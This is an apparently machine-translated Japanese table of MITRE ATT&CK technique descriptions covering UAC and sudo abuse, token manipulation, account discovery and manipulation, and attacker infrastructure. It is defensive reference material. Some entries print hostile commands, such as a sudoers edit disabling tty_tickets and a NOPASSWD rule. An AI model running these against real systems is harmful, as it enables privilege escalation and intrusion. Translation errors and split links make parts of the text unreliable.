ID 名前 記述 pkey
T1548 不正昇格防止機構 敵対者は、特権の昇格を制御するように設計されたメカニズムを回避して、より高いレベルの権限を獲得することがあります。最近のほとんどのシステムには、ユーザーがマシン上で実行できる権限を制限することを目的としたネイティブな昇格制御メカニズムが搭載されています。より高いリスクがあると考えられるタスクを実行するためには、特定のユーザに権限を付与する必要があります。敵対者は、システム上の特権を昇格させるために、組み込みの制御機構を利用するいくつかの方法を実行できます。 1
T1548.002 昇格制御機構の悪用ユーザーアカウント制御のバイパス UAC の仕組みを迂回して、システム上のプロセスの権限を昇格させる可能性があります。Windows のユーザーアカウント制御 (UAC) は、プログラムが管理者レベルの権限でタスクを実行するために、(低から高の範囲の整合性レベルとして追跡される)特権を昇格させることを可能にし、場合によってはユーザーに確認を求めるプロンプトを表示します。ユーザーへの影響は、高権限での操作を拒否する場合から、ユーザーがローカル管理者グループに属していてプロンプトをクリックした場合にアクションを実行することを許可する場合や、アクションを完了するために管理者パスワードを入力することを許可する場合まで様々です。(引用:TechNet How UAC Works)

コンピュータのUAC保護レベルが最高レベル以外に設定されている場合、特定のWindowsプログラムは、UAC通知ボックスを通じてユーザーにプロンプトを表示することなく、特権を昇格させたり、いくつかの昇格した[Component Object Model](https://attack.mitre.org/techniques/T1559/001)オブジェクトを実行したりすることができます。(引用: TechNet Inside UAC) (引用: MSDN COM Elevation) この例として、[Rundll32](https://attack.mitre.org/techniques/T1218/011)を使用して特別に細工されたDLLをロードし、自動的に昇格した[Component Object Model](https://attack.mitre.org/techniques/T1559/001)オブジェクトをロードして、通常は昇格したアクセスを必要とする保護されたディレクトリでファイル操作を実行することが挙げられます。また、悪意のあるソフトウェアが信頼されたプロセスに注入され、ユーザーに促されることなく昇格した特権を得ることもあります。(引用:Davidson Windows)

UACをバイパスする方法は数多く発見されています。UACMEのGithub readmeページには、発見され実装されている方法の広範なリスト(引用:Github UACMe)が含まれていますが、バイパスの包括的なリストではないかもしれません。

* <code>eventvwr.exe</code>は、指定されたバイナリやスクリプトを自動で昇天させて実行することができます。(引用:enigma0x3 Fileless UAC Bypass)(引用:Fortinet Fareit)

また、UACは単一システムのセキュリティ機構であり、あるシステムで実行されているプロセスの権限や整合性は、リモートシステムでは不明であり、デフォルトでは高い整合性が設定されているため、管理者権限を持つアカウントの認証情報が分かっていれば、いくつかの横移動技術によって別のバイパスが可能です。(引用:SANS UAC Bypass)
2
T1548.004 不正な昇格制御メカニズムプロンプト付きの昇順実行 敵対者は、<code>AuthorizationExecuteWithPrivileges</code> APIを利用して、ユーザーに認証情報を求めることで特権を昇格させることができます。(引用:AppleDocs AuthorizationExecuteWithPrivileges) このAPIの目的は、アプリケーションのインストールやアップデートなど、root権限で操作を実行する簡単な方法を、アプリケーション開発者に提供することです。

この API は非推奨ですが、macOS の最新リリースでは完全に機能します。このAPIを呼び出すと、ユーザーは認証情報を入力するように促されますが、プログラムの出所や整合性についてのチェックは行われません。また、このAPIを呼び出したプログラムは、昇格した特権で悪意のある動作を行うために変更可能な世界の書き込み可能なファイルを読み込む可能性があります。

敵対者は、<code>AuthorizationExecuteWithPrivileges</code>を悪用して、被害者に悪意のあるソフトウェアをインストールしたり、持続的なメカニズムをインストールしたりするために、root権限を取得することがあります。(引用:Death by 1000 installers; it's all broken!)(Citation: Carbon Black Shlayer Feb 2019)(Citation: OSX Coldroot RAT) この技術は、[Masquerading](https://attack.mitre.org/techniques/T1036)と組み合わせて、ユーザーを騙して悪意のあるコードに昇格した権限を与えるように仕向けることもあります。(Citation: Death by 1000 installers; it's all broken!)(Citation: Carbon Black Shlayer Feb 2019) この技術は、このAPIを利用するマシン上に存在する正当なプログラムを改変することでも機能することが示されています。(Citation: Death by 1000 installers; it's all broken!)
3
T1548.001 不正な昇格制御機構SetuidとSetgid 敵対者は、シェルエスケープを実行したり、setsuid ビットや setgid ビットが設定されたアプリケーションの脆弱性を利用して、異なるユーザーのコンテキストでコードを実行させることができます。LinuxやmacOSでは、アプリケーションにsetuidビットやsetgidビットが設定されていると、そのアプリケーションは、それぞれ所有するユーザーやグループの権限で実行される。(引用元:setuid manページ)。)通常、アプリケーションは、どのユーザーやグループがアプリケーションを所有しているかに関わらず、現在のユーザーのコンテキストで実行されます。

root が行わなければならない sudoers ファイルへのエントリの作成の代わりに、どのユーザーも自分のアプリケーションに設定する setuid または setgid フラグを指定することができます。これらのビットは、<code>ls -l</code>でファイルの属性を見るときに、"x "の代わりに "s "で示されます。<code>chmod</code>プログラムは、<code>chmod 4777 [file]</code>のようなビットマスキングや<code>chmod u+s [file]</code>のような短縮名でこれらのビットを設定することができます。

敵対者は、将来的に昇格コンテキストで実行できるようにするために、自分のマルウェアにこのメカニズムを使用することができます。(引用:OSX Keydnapマルウェア)。
4
T1548.003 不正な昇格制御機構。SudoとSudoキャッシング 敵対者は、sudo キャッシングを実行したり、suoders ファイルを使用して特権を昇格させることがあります。

Linux や MacOS では、sudo (superuser do) を使うことで、ユーザーが昇格した権限で端末からコマンドを実行したり、システム上でコマンドを実行できるユーザーを制御することができます。<code>sudo</code>コマンドは、「システム管理者が権限を委譲して、特定のユーザー(またはユーザーのグループ)に、コマンドとその引数の監査証跡を提供しながら、rootまたは他のユーザーとして一部(またはすべて)のコマンドを実行する能力を与えることができる」ものです。"(引用:sudo man page 2018) sudoはシステム管理者のために作られたものなので、<code>timestamp_timeout</code>などの便利な設定機能があります。これは、<code>sudo</code>のインスタンス間で、パスワードの再入力を促すまでの時間を分単位で設定するものです。これは、<code>sudo</code>が一定期間の認証情報をキャッシュする機能を持っているからです。Sudo は、このタイムアウトを決定するために、<code>/var/db/sudo</code> に、sudo が最後に実行された時のタイムスタンプを持つファイルを作成(またはタッチ)します。さらに、<code>tty_tickets</code>という変数があり、それぞれの新しいtty(ターミナルセッション)を分離して扱うようになっています。つまり、例えばある tty の sudo のタイムアウトが別の tty に影響を与えることはありません(パスワードを再度入力する必要があります)。

sudoers ファイル、<code>/etc/sudoers</code>には、どのユーザーがどの端末からどのコマンドを実行できるかが記述されています。また、ユーザーが他のユーザーやグループとして実行できるコマンドも記述されています。これにより、ユーザーはほとんどの時間、可能な限り低い権限で実行し、必要に応じて他のユーザーや権限に昇格するだけで、通常はパスワードの入力を求めるという最小特権の原則が実現されます。しかし、sudoersファイルでは、<code>user1 ALL=(ALL) NOPASSWD: ALL</code>のような行で、ユーザーにパスワードの入力を求めない場合を指定することもできます(引用:OSX.Dok Malware)。

敵対者は、これらのメカニズムの不十分な設定を悪用して、ユーザーのパスワードを必要とせずに特権を昇格させることもできます。例えば、<code>/var/db/sudo</code>のタイムスタンプが<code>timestamp_timeout</code>の範囲内にあるかどうかを監視することができます。もしそうであれば、マルウェアはユーザーのパスワードを入力することなく、sudoコマンドを実行することができます。さらに、<code>tty_tickets</code>が無効になっている場合、敵対者はそのユーザーのどのttyからでもこれを実行することができます。

自然界では、マルウェアが<code>tty_tickets</code>を無効にして、<code>echo ″Defaults !tty_tickets″ >> /etc/sudoers</code>を発行することで、スクリプティングを容易にする可能性があります(引用:cybereason osx proton)。また、この変更を反映させるために、マルウェアは<code>killall Terminal</code>を発行しました。macOS Sierraの時点では、sudoersファイルはデフォルトで<code>tty_tickets</code>が有効になっています。
5
T1134 アクセストークンの操作 敵対者はアクセストークンを変更して、異なるユーザーまたはシステムのセキュリティコンテキストで操作し、アクションを実行したり、アクセス制御を回避したりすることがあります。Windows は、実行中のプロセスの所有権を判断するためにアクセストークンを使用します。ユーザーはアクセストークンを操作して、実行中のプロセスが別のプロセスの子であるか、プロセスを開始したユーザー以外に属しているかのように見せることができます。

敵対者は、Windows API の組み込み関数を使用して、既存のプロセスからアクセストークンをコピーすることができます。これはトークンの盗用として知られています。これらのトークンは、既存のプロセスに適用したり (例: [Token Impersonation/Theft](https://attack.mitre.org/techniques/T1134/001))、新しいプロセスを生成するために使用したり (例: [Create Process with Token](https://attack.mitre.org/techniques/T1134/002))することができます。トークンを盗むためには、敵対者がすでに特権ユーザのコンテキスト(管理者など)にいる必要があります。しかし、敵対者は一般的にトークンを盗むことで自分のセキュリティ・コンテキストを管理者レベルからSYSTEMレベルに昇格させます。敵対者は、リモートシステム上で適切な権限を持つアカウントであれば、トークンを使用して、そのトークンのアカウントとしてリモートシステムを認証することができます。(引用:Pentestlab Token Manipulation)

標準的なユーザーであれば、<code>runas</code>コマンドやWindows API関数を使用して、なりすましトークンを作成することができますが、管理者アカウントへのアクセスは必要ありません。また、Active Directoryのフィールドのように、アクセストークンを修正するために使用できる他のメカニズムもあります。
6
T1134.002 Access Token Manipulation:トークンを使ったプロセスの作成 敵対者は、特権を昇格させてアクセス制御を回避するために、複製したトークンで新しいプロセスを作成することがあります。敵対者は、<code>DuplicateToken(Ex)</code>で目的のアクセストークンを複製し、それを<code>CreateProcessWithTokenW</code>で使用して、なりすましたユーザーのセキュリティコンテキストで実行される新しいプロセスを作成することができます。これは、別のユーザのセキュリティ・コンテキストの下で新しいプロセスを作成するのに便利です。 7
T1134.003 Access Token Manipulation:トークンの作成と偽装 敵対者は、トークンを作成してなりすまし、特権を昇格させたり、アクセス制御を回避したりすることができます。敵対者がユーザー名とパスワードを持っていても、そのユーザーがシステムにログオンしていない場合、<code>LogonUser</code>関数を使って、そのユーザーのログオンセッションを作成することができます。この関数は新しいセッションのアクセストークンのコピーを返すので、敵対者は<code>SetThreadToken</code>を使用して、トークンをスレッドに割り当てることができます。 8
T1134.004 Access Token Manipulation:親のPIDの詐称 敵対者は、新しいプロセスの親プロセス識別子 (PPID) を偽装して、プロセス監視の防御を回避したり、特権を昇格させたりすることがあります。新しいプロセスは、明示的に指定されていない限り、通常、親プロセス、つまり呼び出し元のプロセスから直接生成されます。新しいプロセスのPPIDを明示的に割り当てる1つの方法は、<code>CreateProcess</code> APIコールを介したもので、使用するPPIDを定義するパラメータをサポートしています(Citation: DidierStevens SelectMyParent Nov 2009)この機能は、要求された昇格プロセスがSYSTEMによって(通常は<code>svchost.exe</code>または<code>consent.exe</code>)ではなく、現在のユーザーコンテキストに設定されます。(引用:Microsoft UAC Nov 2018)

敵対者はこれらのメカニズムを悪用して、Officeドキュメントから直接生成されるプロセスをブロックするなどの防御を回避したり、[PowerShell]のPPIDを偽装するなど、通常とは異なる/潜在的に悪意のある親子プロセスの関係をターゲットにした分析を行う可能性があります。(https://attack.mitre.org/techniques/T1059/001)/[Rundll32](https://attack.mitre.org/techniques/T1218/011)のPPIDを、[Spearphishing Attachment](https://attack.mitre.org/techniques/T1566/001)の一部として配信されたOfficeドキュメントではなく、<code>explorer.exe</code>とすることなどが挙げられます(引用:CounterCept PPID Spoofing Dec 2018)このスプーフィングは、[Visual Basic](https://attack.mitre.org/techniques/T1059/005)内の悪意のあるOfficeドキュメントや、[Native API](https://attack.mitre.org/techniques/T1106)を実行できるコードで実行される可能性があります。(Citation: CTD PPID Spoofing Macro Mar 2019)(Citation: CounterCept PPID Spoofing Dec 2018)

また、PPIDを明示的に割り当てることで、親プロセスへの適切なアクセス権が与えられた場合に、昇格した特権が可能になる場合があります。たとえば、特権ユーザーのコンテキスト(管理者など)にいる敵対者は、新しいプロセスを生成し、親をSYSTEMとして実行するプロセス(<code>lsass.exe</code>など)として割り当てることで、継承したアクセストークンを介して新しいプロセスを昇格させることができます(引用:XPNSec PPID 2017年11月)
9
T1134.005 アクセストークン・マニピュレーションSID-ヒストリーインジェクション 敵対者は、SID-History インジェクションを使用して、特権を昇格させたり、アクセス制御を回避したりする可能性があります。Windows セキュリティ識別子 (SID) は、ユーザーまたはグループのアカウントを識別する一意の値です。SIDは、Windowsセキュリティによって、セキュリティ記述子とアクセストークンの両方で使用されます。(引用:Microsoft SID)アカウントは、SID-History Active Directory属性(引用:Microsoft SID-History Attribute)に追加のSIDを保持することができ、ドメイン間でのアカウントの相互移行が可能になります(例:SID-Historyのすべての値がアクセストークンに含まれます)。

ドメイン管理者(または同等)の権限で、収穫されたまたはよく知られたSID値(引用:Microsoft Well Known SIDs Jun 2017)をSID-Historyに挿入して、企業管理者などの任意のユーザー/グループになりすますことができる場合があります。この操作により、ローカルリソースへの昇格アクセス、および/または、[リモートサービス](https://attack.mitre.org/techniques/T1021)、[SMB/Windows Admin Shares](https://attack.mitre.org/techniques/T1021/002)、[Windows Remote Management](https://attack.mitre.org/techniques/T1021/006)などの横移動技術を介して、他の方法ではアクセスできないドメインへのアクセスが可能になる場合があります。
10
T1134.001 Access Token Manipulation(アクセス・トークンの操作)。トークンの偽装・窃盗 敵対者は、別のユーザーのトークンを複製してなりすまし、権限を拡大したりアクセス制御を回避したりすることがあります。敵対者は、<code>DuplicateToken(Ex)</code>を使用して、既存のトークンを複製した新しいアクセストークンを作成することができます。そのトークンは、<code>ImpersonateLoggedOnUser</code>を使って、呼び出したスレッドがログオンしているユーザーのセキュリティ・コンテキストになりすましたり、<code>SetThreadToken</code>を使って、なりすまされたトークンをスレッドに割り当てたりすることができます。

敵対者は、新しいトークンを割り当てたい特定の既存のプロセスがある場合に、このようにすることができます。例えば、ターゲット・ユーザーがシステム上でネットワーク以外のログオン・セッションを持っている場合などに有効です。
11
T1531 アカウントアクセスの削除 敵対者は、正当なユーザが使用するアカウントへのアクセスを阻害することで、システムやネットワークリソースの利用を妨害します。アカウントへのアクセスを排除するために、アカウントの削除、ロック、または操作(例:認証情報の変更)が行われることがあります。

敵対者は、悪意のある変更を設定するために、その後ボックスをログオフおよび/または再起動することもあります。(引用:CarbonBlack LockerGoga 2019)(引用:Unit42 LockerGoga 2019)
12
T1087 アカウントの発見 敵対者は、システム上または環境内のアカウントのリストを取得しようとすることがあります。この情報は、敵対者がどのアカウントが存在するかを判断し、後続の行動を支援するのに役立ちます。 13
T1087.004 アカウント発見。クラウドアカウント 敵対者は、クラウドアカウントのリストを取得しようとする可能性があります。クラウドアカウントとは、ユーザー、リモートサポート、サービス、またはクラウドサービスプロバイダーやSaaSアプリケーション内のリソースの管理に使用するために、組織によって作成および設定されたアカウントのことです。

認証されたアクセスでは、アカウントを見つけるために使用できるツールがいくつかあります。<code>Get-MsolRoleMember</code> PowerShellコマンドレットは、Office 365のロールや権限グループを与えられたアカウント名を取得するために使用することができます。(Citation: Microsoft msolrolemember)(Citation: GitHub Raindance) Azure CLI(AZ CLI)も、ドメインへの認証されたアクセスを持つユーザーアカウントを取得するためのインターフェースを提供しています。<code>az ad user list</code>というコマンドは、ドメイン内のすべてのユーザーをリストアップします。(Citation: Microsoft AZ CLI)(Citation: Black Hills Red Teaming MS AD Azure, 2018)

AWSのコマンド<code>aws iam list-users</code>は、現在のアカウントのユーザーリストを取得するために使用することができ、<code>aws iam list-roles</code>は、指定されたパスプレフィックスを持つIAMロールを取得することができる。(Citation: AWS List Roles)(Citation: AWS List Users) GCPでは、<code>gcloud iam service-accounts list</code>と<code>gcloud projects get-iam-policy</code>を使って、プロジェクト内のサービスアカウントとユーザーの一覧を取得することができます。(Citation: Google Cloud - IAM Servie Accounts List API)
14
T1087.002 アカウントの発見ドメインアカウント 敵対者は、ドメインアカウントのリストを取得しようとするかもしれません。

[Net](https://attack. mitre.org/software/S0039)の<code>net user /domain</code>や<code>net group /domain</code>などのコマンドは、敵対者がどのドメインアカウントが存在するかを判断し、後続の行動を支援するのに役立ちます。mitre.org/software/S0039)ユーティリティ、macOSでは<code>dscacheutil -q group</code>、Linuxでは<code>ldapsearch</code>などのコマンドで、ドメインユーザーやグループをリストアップすることができる。
15
T1087.003 アカウントの発見メールアカウント 敵対者は、電子メールアドレスやアカウントのリストを取得しようとする場合があります。Adversaries may try to dump Exchange address lists such as global address lists (GALs).(Citation: Microsoft Exchange Address Lists)

オンプレミスのExchangeとExchange Onlineでは、<code>Get-GlobalAddressList</code> PowerShellコマンドレットを使用して、認証されたセッションを使用してドメインから電子メール アドレスとアカウントを取得できます。(引用:Microsoft getglobaladdresslist)(引用:Black Hills Attacking Exchange MailSniper, 2016)

Google Workspaceでは、Google Workspace Sync for Microsoft Outlook(GWSMO)サービスを通じて、Microsoft OutlookユーザーとGALを共有しています。さらに、Google Workspace Directoryでは、ユーザーが組織内の他のユーザーのリストを取得することができます。(引用:Google Workspace Global Access List)
16
T1087.001 アカウント発見。ローカルアカウント 敵対者は、ローカルシステムアカウントのリストを取得しようとすることがあります。

[Net](https://attack.mitre.org/software/S0039)ユーティリティの<code>net user</code>や<code>net localgroup</code>、macOSやLinuxの<code>id</code>や<code>groups</code>などのコマンドで、ローカルユーザやグループを一覧できます。Linuxでは、<code>/etc/passwd</code>ファイルを使って、ローカルユーザを列挙することもできます。
17
T1098 アカウントの操作 敵対者は、被害者のシステムへのアクセスを維持するためにアカウントを操作することがあります。アカウントの操作とは、認証情報や権限グループの変更など、侵害されたアカウントへの敵対者のアクセスを維持するためのあらゆる行為を指します。また、これらの行為には、パスワードの持続時間のポリシーを回避し、侵害された認証情報の寿命を維持するために、反復的なパスワード更新を実行するなど、セキュリティポリシーを覆すように設計されたアカウント活動も含まれます。アカウントを作成または操作するためには、敵対者は既にシステムまたはドメインに対して十分な権限を持っていなければならない。 18
T1098.003 アカウントを操作する。Office 365 グローバル管理者の役割の追加 敵対者は、Office 365 テナントへの永続的なアクセスを維持するために、敵対者が管理するアカウントにグローバル管理者ロールを追加する可能性があります。(引用: Microsoft Support O365 Add Another Admin, October 2019)(引用: Microsoft O365 Admin Roles) 十分な権限があれば、侵害されたアカウントは、グローバル管理者ロールを介してデータや設定(他の管理者のパスワードをリセットする機能を含む)へのほぼ無制限のアクセスを得ることができます。(引用: Microsoft O365 Admin Roles)

このアカウントの変更は、[アカウントの作成](https://attack.mitre.org/techniques/T1136)またはその他の悪意のあるアカウント活動の直後に行われる可能性があります。
19
T1098.001 アカウントの不正操作クラウド認証情報の追加

敵対者は、環境内の犠牲者のアカウントやインスタンスへの永続的なアクセスを維持するために、クラウド アカウントに敵対者が管理する認証情報を追加することができます。敵対者は、Azure ADの既存の正当な認証情報に加えて、サービス プリンシパルとアプリケーションの認証情報を追加することができます。(引用: Microsoft SolarWinds Customer Guidance)(引用: Blue Cloud of Death)(引用: Blue Cloud of Death Video) これらのクレデンシャルには、x509キーとパスワードの両方が含まれます。(引用: Microsoft SolarWinds Customer Guidance) 十分なパーミッションがあれば、Azureポータル、Azureコマンドラインインターフェイス、AzureまたはAz PowerShellモジュールなど、クレデンシャルを追加するさまざまな方法があります。(引用:Demystifying Azure AD Service Principals)

IaaS(Infrastructure-as-a-Service)環境では、[Cloud Accounts]でアクセスした後(https://attack.mitre.org/techniques/T1078/004)、敵対者は、AWSの<code>CreateKeyPair</code>や<code>ImportKeyPair</code> APIや、GCPの<code>gcloud compute os-login ssh-keys add</code>コマンドのいずれかを使用して、独自のSSHキーを生成またはインポートすることができます。(引用:GCP SSH Key Add) これにより、漏洩したクラウドのアカウントをそれ以上使用することなく、クラウド環境内のインスタンスへの永続的なアクセスが可能になります。(引用:Expel IO Evil in AWS)(引用:Expel Behind the Scenes)
20
T1098.002 アカウントを操作するExchangeメールの代行権限 敵対者は、敵対者が支配する電子メール アカウントへの永続的なアクセスを維持するために、ReadPermission や FullAccess などの追加の許可レベルを付与することがあります。オンプレミスのExchangeやクラウドベースのサービスであるOffice 365で利用可能な<code>Add-MailboxPermission</code> [PowerShell](https://attack.mitre.org/techniques/T1059/001)コマンドレットは、メールボックスに権限を追加します。(引用:Microsoft - Add-MailboxPermission)(引用:FireEye APT35 2018)(引用:Crowdstrike Hiding in Plain Sight 2018)

これは、持続的脅威インシデントだけでなく、BEC(Business Email Compromise)インシデントでも使用される可能性があり、敵対者は侵害したいアカウントに多くのアクセス権を割り当てることができます。これにより、システムにアクセスするための新たな技術を使用することが可能になります。例えば、侵害されたビジネスアカウントは、受信ルール(例:[Internal Spearphishing](https://attack.mitre.org/techniques/T1534))を作成しながら、ターゲットビジネスのネットワーク内の他のアカウントにメッセージを送信するために使用されることが多く、メッセージがスパム/フィッシングの検出メカニズムを回避することができます。(引用:Bienstock, D. - Defending O365 - 2019)
21
T1098.004 アカウントの不正操作SSH認証キー 侵入者は、SSH の <code>authorized_keys</code> ファイルを変更して、犠牲者のホスト上での永続性を維持することがあります。Linux ディストリビューションや macOS では、リモート管理のための SSH セッションの認証プロセスを安全に行うために、鍵ベースの認証が一般的に使用されています。SSHの<code>authorized_keys</code>ファイルは、このファイルが設定されているユーザーアカウントへのログインに使用できるSSH鍵を指定します。このファイルは通常、ユーザーのホームディレクトリの <code>&lt;user-home&gt;/.ssh/authorized_keys</code> にあります。(引用:SSH Authorized Keys) ユーザーは、システムの SSH コンフィグファイルを編集して、PubkeyAuthentication と RSAAuthentication というディレクティブを値「yes」に変更し、公開鍵と RSA 認証が有効になるようにすることができます。SSH設定ファイルは、通常<code>/etc/ssh/sshd_config</code>の下にあります。

敵対者は、SSHの<code>authorized_keys</code>ファイルをスクリプトやシェルコマンドで直接修正して、敵対者が提供した独自の公開鍵を追加することができます。これにより、対応する秘密鍵を持つ敵対者が、既存のユーザーとしてSSHでログインできるようになります。(引用:Venafi SSH Key Abuse) (引用:Cybereason Linux Exim Worm)
22
T1583 インフラの獲得 敵対者は、ターゲティング時に使用できるインフラを購入、リース、またはレンタルすることができます。敵対者の作戦をホストしたり指揮したりするためのインフラは、多種多様に存在します。インフラのソリューションには、物理的またはクラウドのサーバ、ドメイン、サードパーティのWebサービスなどがあります(引用:TlendmicroHideoutsLease)また、ボットネットもレンタルまたは購入することができます。

これらのインフラソリューションを使用することで、敵対者は作戦を準備し、開始し、実行することができます。これらのソリューションを利用することで、敵対者は、サードパーティのウェブサービスへの接続など、通常と思われるトラフィックに紛れて操作を行うことができます。実装方法によっては、敵対者は、物理的に接続することが困難なインフラを使用したり、迅速なプロビジョニング、変更、およびシャットダウンが可能なインフラを利用したりすることができます。
23
T1583.005 アクワイアのインフラボットネット ボットネットとは、協調してタスクを実行するように指示できる侵害されたシステムのネットワークです。ボットネットとは、協調してタスクを実行するように指示できる侵害されたシステムのネットワークのことです(引用:Norton Botnet)敵対者は、ブートヤー/ストレッサーサービスから既存のボットネットを使用するためのサブスクリプションを購入することができます。ボットネットを自由に使えるようになると、敵対者は大規模な[Phishing](https://attack.mitre.org/techniques/T1566)や分散型サービス拒否(DDoS)などの後続活動を行うことができます。(引用: Imperva DDoS for Hire)(引用: Krebs-Anna)(引用: Krebs-Bazaar)(引用: Krebs-Booter) 24
T1583.002 インフラを獲得する。DNSサーバー 敵対者は、標的化の際に使用できる独自のDNS(Domain Name System)サーバーを設置することがあります。侵害後の活動において、敵対者はDNSトラフィックをコマンド&コントロール(例:[Application Layer Protocol](https://attack.mitre.org/techniques/T1071))などの様々なタスクに利用することができます。

敵対者は、既存のDNSサーバをハイジャックするのではなく、運用をサポートするために独自のDNSサーバを構成して実行することを選択する場合があります。独自のDNSサーバを実行することで、敵対者は、サーバ側のDNS C2トラフィックの管理方法をより細かく制御することができます([DNS](https://attack.mitre.org/techniques/T1071/004))。DNSサーバーを制御することで、敵対者は、マルウェアに条件付き応答を提供するようにDNSアプリケーションを構成することができ、一般的に、DNSベースのC2チャネルの構造に柔軟性を持たせることができます(引用:Unit42 DNS 2019年3月)
25
T1583.001 アクワイアのインフラドメイン 敵対者は、ターゲティングの際に使用できるドメインを購入することがあります。ドメイン名は、1つまたは複数のIPアドレスを表すために使用される人間が読める名前です。

敵対者は購入したドメインを、[Phishing](https://attack.mitre.org/techniques/T1566)、[Drive-by Compromise](https://attack.mitre.org/techniques/T1189)、[Command and Control]など、さまざまな目的で使用することができます。(引用: CISA MSS Sep 2020) 敵対者は、同音異義語の使用や異なるトップレベルドメイン(TLD)の使用など、正規のドメインに類似したドメインを選択することができます。(引用: FireEye APT28)(引用: PaypalScam) タイポスクワッティングは、[Drive-by Compromise](https://attack.mitre.org/techniques/T1189)によるペイロードの配信を支援するために使用されることがあります。また、敵は国際化ドメイン名 (IDN) を使って、外見的に似たドメインを作り、作戦に利用することもできます。(引用: CISA IDN ST05-016)

ドメイン登録者は、登録されたすべてのドメインの連絡先を表示する、一般に閲覧可能なデータベースを維持しています。プライベートWHOISサービスでは、ドメインの所有者ではなく、自社の会社情報などの代替情報が表示されます。敵対者はこのようなプライベートWHOISサービスを利用して、購入したドメインの所有者に関する情報を隠蔽することがあります。敵対者は、登録情報を変えたり、異なるドメインレジストラでドメインを購入したりすることで、自分たちのインフラを追跡する努力をさらに妨害する可能性があります。
26
T1583.004 アクワイアのインフラサーバー 敵対者は、ターゲティングの際に使用できる物理的なサーバーを購入、リース、またはレンタルすることができます。サーバーを使用することで、敵対者は作戦を準備、開始、実行することができます。危殆化した後の活動では、敵対者はコマンド&コントロールなどの様々なタスクにサーバを利用することができます。敵対者は、サードパーティの[サーバ](https://attack.mitre.org/techniques/T1584/004)を侵害したり、[Virtual Private Server](https://attack.mitre.org/techniques/T1583/003)をレンタルしたりするのではなく、作戦をサポートするために独自のサーバを設定・運用することを選択する場合があります。

敵対者は、活動のほとんどがオンラインインフラストラクチャを使用して行われる場合には、軽量のセットアップしか必要ないかもしれません。また、自分のシステムでテスト、通信、その他の活動をコントロールしたい場合は、大規模なインフラを構築する必要があるかもしれません。
27
T1583.003 インフラを獲得する。仮想プライベートサーバ 敵対者は、ターゲティング時に使用できる仮想プライベートサーバー(VPS)をレンタルすることができます。仮想マシンやコンテナをサービスとして販売するクラウドサービスプロバイダーは数多く存在します。VPSを利用することで、敵対者は物理的にオペレーションを結びつけることを困難にすることができます。また、クラウド・インフラを利用することで、敵対者は自分のインフラを迅速にプロビジョニング、変更、シャットダウンすることが容易になります。

コマンド&コントロールなど、敵対者のライフサイクルの後期段階で使用するためにVPSを取得することで、敵対者は、より高い評価を得ているクラウド・サービス・プロバイダーに関連するユビキタス性と信頼性の恩恵を受けることができます。また、最小限の登録情報でVPSをレンタルしていることで知られるVPSサービスプロバイダーからインフラを取得することで、より匿名性の高いインフラの取得が可能になります(引用:TrendmicroHideoutsLease)
28
T1583.006 インフラを整える。ウェブサービス 敵対者は、ターゲティング時に使用できるWebサービスに登録することができます。敵対者がウェブベースのサービスに登録するためのさまざまな人気ウェブサイトが存在します。これらのサービスは、敵対者のライフサイクルの後の段階、たとえばコマンド&コントロール([ウェブサービス](https://attack.mitre.org/techniques/T1102))や[ウェブサービスを利用した侵入]([ウェブサービスを利用した侵入])(https://attack.mitre.org/techniques/T1567)の際に悪用することができます。GoogleやTwitterのような一般的なサービスを利用することで、敵対者は予想されるノイズの中に簡単に隠れることができます。ウェブサービスを利用することで、敵対者は物理的に操作を結びつけることを困難にすることができます。 29
T1595 アクティブスキャン 敵対者は、ターゲティング時に使用できる情報を収集するために、能動的な偵察スキャンを実行することがあります。

敵対者は、収集しようとする情報に応じて、さまざまな形式の能動的スキャンを実行することがあります。これらのスキャンは、ICMPなどのネットワークプロトコルのネイティブな機能を使用するなど、さまざまな方法で実行することができます。(引用: Botnet Scan)(引用: OWASP Fingerprinting) これらのスキャンによる情報は、他の形式の偵察の機会を明らかにするかもしれません(例: [Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593)や[Search Open Technical Databases](https://attack.)。mitre.org/techniques/T1596))、運用資源の確立(例:[Develop Capabilities](https://attack.mitre.org/techniques/T1587)または[Obtain Capabilities](https://attack.mitre.org/techniques/T1588))、および/または初期アクセス(例:[External Remote Services](https://attack.mitre.org/techniques/T1133)または[Exploit Public-Facing Application](https://attack.mitre.org/techniques/T1190))。
30
T1595.001 アクティブ・スキャンIPブロックのスキャン 敵対者は、ターゲティングの際に使用できる情報を収集するために、被害者のIPブロックをスキャンすることがあります。

敵対者は、どのIPアドレスが積極的に使用されているかや、これらのアドレスが割り当てられているホストに関するより詳細な情報など、[Gather Victim Network Information](https://attack.mitre.org/techniques/T1590)のためにIPブロックをスキャンすることがあります。スキャンの範囲は、単純なping(ICMPのリクエストとレスポンス)から、サーバーバナーやその他のネットワーク成果物を介してホストのソフトウェアやバージョンを明らかにするような、より微妙なスキャンまで多岐にわたります(引用:Botnet Scan)。これらのスキャンによる情報は、他の形態の偵察の機会を明らかにするかもしれません(例:[Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593)や[Search Open Technical Databases](https://attack.mitre.org/techniques/T1596))、運用リソースの確立(例:[Develop Capabilities](https://attack.mitre.org/techniques/T1587)や[Obtain Capabilities](https://attack.mitre.org/techniques/T1588))、および/または初期アクセス(例:[External Remote Services](https://attack.mitre.org/techniques/T1133))の機会が見つかるかもしれません。
31
T1595.002 アクティブ・スキャニング脆弱性スキャン 敵対者は、標的を狙う際に利用可能な脆弱性を被害者にスキャンすることがあります。

これらのスキャンには、より一般的に知られている悪用可能な脆弱性を特定するために使用できる「被害者のホスト情報の収集」(https://attack.mitre.org/techniques/T1592)という、より広範な試みが含まれることもあります。脆弱性スキャンでは、一般的に、サーバーのバナー、リスニングポート、またはその他のネットワークの成果物を介して、実行中のソフトウェアとバージョン番号を収集します(引用:OWASP Vuln Scanning)。これらのスキャンによる情報は、他の形態の偵察の機会を明らかにするかもしれません(例:[Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593)または[Search Open Technical Databases](https://attack.mitre.org/techniques/T1596))、運用資源の確立(例:[Develop Capabilities](https://attack.mitre.org/techniques/T1587)または[Obtain Capabilities](https://attack.mitre.org/techniques/T1588))、および/または初期アクセス(例:[Exploit Public-Facing Application](https://attack.mitre.org/techniques/T1190))の機会を発見するかもしれません。
32
T1071 アプリケーション層プロトコル 敵対者は、既存のトラフィックに紛れ込むことで検知やネットワークフィルタリングを回避するために、アプリケーション層のプロトコルを使用して通信することがあります。

